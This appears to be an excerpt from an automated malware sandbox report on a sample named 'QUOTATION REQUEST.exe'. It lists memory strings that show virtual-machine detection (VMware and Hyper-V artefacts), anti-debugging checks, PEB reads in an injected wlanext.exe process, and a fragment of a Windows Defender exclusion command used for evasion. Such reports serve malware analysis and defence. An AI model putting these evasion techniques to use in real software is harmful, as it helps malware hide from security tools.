Source: explorer.exe, 00000005.00000000.252971907.0000000008907000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: explorer.exe, 00000005.00000000.256483067.000000000F540000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.249430731.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: vmware
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000002.494643012.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000000.250059832.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000005.00000000.241452030.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_004088B0 rdtsc 3_2_004088B0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_00409B20 LdrLoadDll, 3_2_00409B20
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FF358 mov eax, dword ptr fs:[00000030h] 9_2_035FF358
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03623B7A mov eax, dword ptr fs:[00000030h] 9_2_03623B7A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03623B7A mov eax, dword ptr fs:[00000030h] 9_2_03623B7A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FDB40 mov eax, dword ptr fs:[00000030h] 9_2_035FDB40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C8B58 mov eax, dword ptr fs:[00000030h] 9_2_036C8B58
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FDB60 mov ecx, dword ptr fs:[00000030h] 9_2_035FDB60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B131B mov eax, dword ptr fs:[00000030h] 9_2_036B131B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h] 9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h] 9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h] 9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h] 9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h] 9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h] 9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361DBE9 mov eax, dword ptr fs:[00000030h] 9_2_0361DBE9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036753CA mov eax, dword ptr fs:[00000030h] 9_2_036753CA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036753CA mov eax, dword ptr fs:[00000030h] 9_2_036753CA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C5BA5 mov eax, dword ptr fs:[00000030h] 9_2_036C5BA5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03624BAD mov eax, dword ptr fs:[00000030h] 9_2_03624BAD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03624BAD mov eax, dword ptr fs:[00000030h] 9_2_03624BAD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03624BAD mov eax, dword ptr fs:[00000030h] 9_2_03624BAD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B138A mov eax, dword ptr fs:[00000030h] 9_2_036B138A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036AD380 mov ecx, dword ptr fs:[00000030h] 9_2_036AD380
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03601B8F mov eax, dword ptr fs:[00000030h] 9_2_03601B8F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03601B8F mov eax, dword ptr fs:[00000030h] 9_2_03601B8F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362B390 mov eax, dword ptr fs:[00000030h] 9_2_0362B390
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03622397 mov eax, dword ptr fs:[00000030h] 9_2_03622397
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036AB260 mov eax, dword ptr fs:[00000030h] 9_2_036AB260
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036AB260 mov eax, dword ptr fs:[00000030h] 9_2_036AB260
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C8A62 mov eax, dword ptr fs:[00000030h] 9_2_036C8A62
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0363927A mov eax, dword ptr fs:[00000030h] 9_2_0363927A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h] 9_2_035F9240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h] 9_2_035F9240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h] 9_2_035F9240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h] 9_2_035F9240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BEA55 mov eax, dword ptr fs:[00000030h] 9_2_036BEA55
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03684257 mov eax, dword ptr fs:[00000030h] 9_2_03684257
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FAA16 mov eax, dword ptr fs:[00000030h] 9_2_035FAA16
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FAA16 mov eax, dword ptr fs:[00000030h] 9_2_035FAA16
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03634A2C mov eax, dword ptr fs:[00000030h] 9_2_03634A2C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03634A2C mov eax, dword ptr fs:[00000030h] 9_2_03634A2C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F5210 mov eax, dword ptr fs:[00000030h] 9_2_035F5210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F5210 mov ecx, dword ptr fs:[00000030h] 9_2_035F5210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F5210 mov eax, dword ptr fs:[00000030h] 9_2_035F5210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F5210 mov eax, dword ptr fs:[00000030h] 9_2_035F5210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03608A0A mov eax, dword ptr fs:[00000030h] 9_2_03608A0A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03613A1C mov eax, dword ptr fs:[00000030h] 9_2_03613A1C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BAA16 mov eax, dword ptr fs:[00000030h] 9_2_036BAA16
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BAA16 mov eax, dword ptr fs:[00000030h] 9_2_036BAA16
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03622AE4 mov eax, dword ptr fs:[00000030h] 9_2_03622AE4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03622ACB mov eax, dword ptr fs:[00000030h] 9_2_03622ACB
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360AAB0 mov eax, dword ptr fs:[00000030h] 9_2_0360AAB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360AAB0 mov eax, dword ptr fs:[00000030h] 9_2_0360AAB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362FAB0 mov eax, dword ptr fs:[00000030h] 9_2_0362FAB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362D294 mov eax, dword ptr fs:[00000030h] 9_2_0362D294
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362D294 mov eax, dword ptr fs:[00000030h] 9_2_0362D294
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h] 9_2_035F52A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h] 9_2_035F52A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h] 9_2_035F52A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h] 9_2_035F52A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h] 9_2_035F52A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361B944 mov eax, dword ptr fs:[00000030h] 9_2_0361B944
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361B944 mov eax, dword ptr fs:[00000030h] 9_2_0361B944
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FB171 mov eax, dword ptr fs:[00000030h] 9_2_035FB171
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FB171 mov eax, dword ptr fs:[00000030h] 9_2_035FB171
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FC962 mov eax, dword ptr fs:[00000030h] 9_2_035FC962
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h] 9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h] 9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h] 9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h] 9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03614120 mov ecx, dword ptr fs:[00000030h] 9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362513A mov eax, dword ptr fs:[00000030h] 9_2_0362513A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362513A mov eax, dword ptr fs:[00000030h] 9_2_0362513A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F9100 mov eax, dword ptr fs:[00000030h] 9_2_035F9100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F9100 mov eax, dword ptr fs:[00000030h] 9_2_035F9100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F9100 mov eax, dword ptr fs:[00000030h] 9_2_035F9100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036841E8 mov eax, dword ptr fs:[00000030h] 9_2_036841E8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FB1E1 mov eax, dword ptr fs:[00000030h] 9_2_035FB1E1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FB1E1 mov eax, dword ptr fs:[00000030h] 9_2_035FB1E1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FB1E1 mov eax, dword ptr fs:[00000030h] 9_2_035FB1E1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036769A6 mov eax, dword ptr fs:[00000030h] 9_2_036769A6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036261A0 mov eax, dword ptr fs:[00000030h] 9_2_036261A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036261A0 mov eax, dword ptr fs:[00000030h] 9_2_036261A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h] 9_2_036B49A4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h] 9_2_036B49A4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h] 9_2_036B49A4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h] 9_2_036B49A4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h] 9_2_036751BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h] 9_2_036751BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h] 9_2_036751BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h] 9_2_036751BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361C182 mov eax, dword ptr fs:[00000030h] 9_2_0361C182
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362A185 mov eax, dword ptr fs:[00000030h] 9_2_0362A185
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03622990 mov eax, dword ptr fs:[00000030h] 9_2_03622990
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B2073 mov eax, dword ptr fs:[00000030h] 9_2_036B2073
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C1074 mov eax, dword ptr fs:[00000030h] 9_2_036C1074
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03610050 mov eax, dword ptr fs:[00000030h] 9_2_03610050
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03610050 mov eax, dword ptr fs:[00000030h] 9_2_03610050
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h] 9_2_0360B02A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h] 9_2_0360B02A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h] 9_2_0360B02A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h] 9_2_0360B02A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h] 9_2_0362002D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h] 9_2_0362002D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h] 9_2_0362002D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h] 9_2_0362002D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h] 9_2_0362002D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03677016 mov eax, dword ptr fs:[00000030h] 9_2_03677016
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03677016 mov eax, dword ptr fs:[00000030h] 9_2_03677016
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03677016 mov eax, dword ptr fs:[00000030h] 9_2_03677016
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C4015 mov eax, dword ptr fs:[00000030h] 9_2_036C4015
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C4015 mov eax, dword ptr fs:[00000030h] 9_2_036C4015
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F58EC mov eax, dword ptr fs:[00000030h] 9_2_035F58EC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0368B8D0 mov ecx, dword ptr fs:[00000030h] 9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F40E1 mov eax, dword ptr fs:[00000030h] 9_2_035F40E1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F40E1 mov eax, dword ptr fs:[00000030h] 9_2_035F40E1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F40E1 mov eax, dword ptr fs:[00000030h] 9_2_035F40E1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h] 9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h] 9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h] 9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h] 9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h] 9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h] 9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036390AF mov eax, dword ptr fs:[00000030h] 9_2_036390AF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362F0BF mov ecx, dword ptr fs:[00000030h] 9_2_0362F0BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362F0BF mov eax, dword ptr fs:[00000030h] 9_2_0362F0BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362F0BF mov eax, dword ptr fs:[00000030h] 9_2_0362F0BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F9080 mov eax, dword ptr fs:[00000030h] 9_2_035F9080
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03673884 mov eax, dword ptr fs:[00000030h] 9_2_03673884
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03673884 mov eax, dword ptr fs:[00000030h] 9_2_03673884
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360FF60 mov eax, dword ptr fs:[00000030h] 9_2_0360FF60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C8F6A mov eax, dword ptr fs:[00000030h] 9_2_036C8F6A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360EF40 mov eax, dword ptr fs:[00000030h] 9_2_0360EF40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362E730 mov eax, dword ptr fs:[00000030h] 9_2_0362E730
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C070D mov eax, dword ptr fs:[00000030h] 9_2_036C070D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C070D mov eax, dword ptr fs:[00000030h] 9_2_036C070D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362A70E mov eax, dword ptr fs:[00000030h] 9_2_0362A70E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362A70E mov eax, dword ptr fs:[00000030h] 9_2_0362A70E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F4F2E mov eax, dword ptr fs:[00000030h] 9_2_035F4F2E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F4F2E mov eax, dword ptr fs:[00000030h] 9_2_035F4F2E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361F716 mov eax, dword ptr fs:[00000030h] 9_2_0361F716
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0368FF10 mov eax, dword ptr fs:[00000030h] 9_2_0368FF10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0368FF10 mov eax, dword ptr fs:[00000030h] 9_2_0368FF10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036337F5 mov eax, dword ptr fs:[00000030h] 9_2_036337F5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03677794 mov eax, dword ptr fs:[00000030h] 9_2_03677794
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03677794 mov eax, dword ptr fs:[00000030h] 9_2_03677794
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03677794 mov eax, dword ptr fs:[00000030h] 9_2_03677794
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03608794 mov eax, dword ptr fs:[00000030h] 9_2_03608794
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360766D mov eax, dword ptr fs:[00000030h] 9_2_0360766D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h] 9_2_0361AE73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h] 9_2_0361AE73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h] 9_2_0361AE73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h] 9_2_0361AE73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h] 9_2_0361AE73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h] 9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h] 9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h] 9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h] 9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h] 9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h] 9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BAE44 mov eax, dword ptr fs:[00000030h] 9_2_036BAE44
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BAE44 mov eax, dword ptr fs:[00000030h] 9_2_036BAE44
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036AFE3F mov eax, dword ptr fs:[00000030h] 9_2_036AFE3F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FC600 mov eax, dword ptr fs:[00000030h] 9_2_035FC600
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FC600 mov eax, dword ptr fs:[00000030h] 9_2_035FC600
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FC600 mov eax, dword ptr fs:[00000030h] 9_2_035FC600
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03628E00 mov eax, dword ptr fs:[00000030h] 9_2_03628E00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1608 mov eax, dword ptr fs:[00000030h] 9_2_036B1608
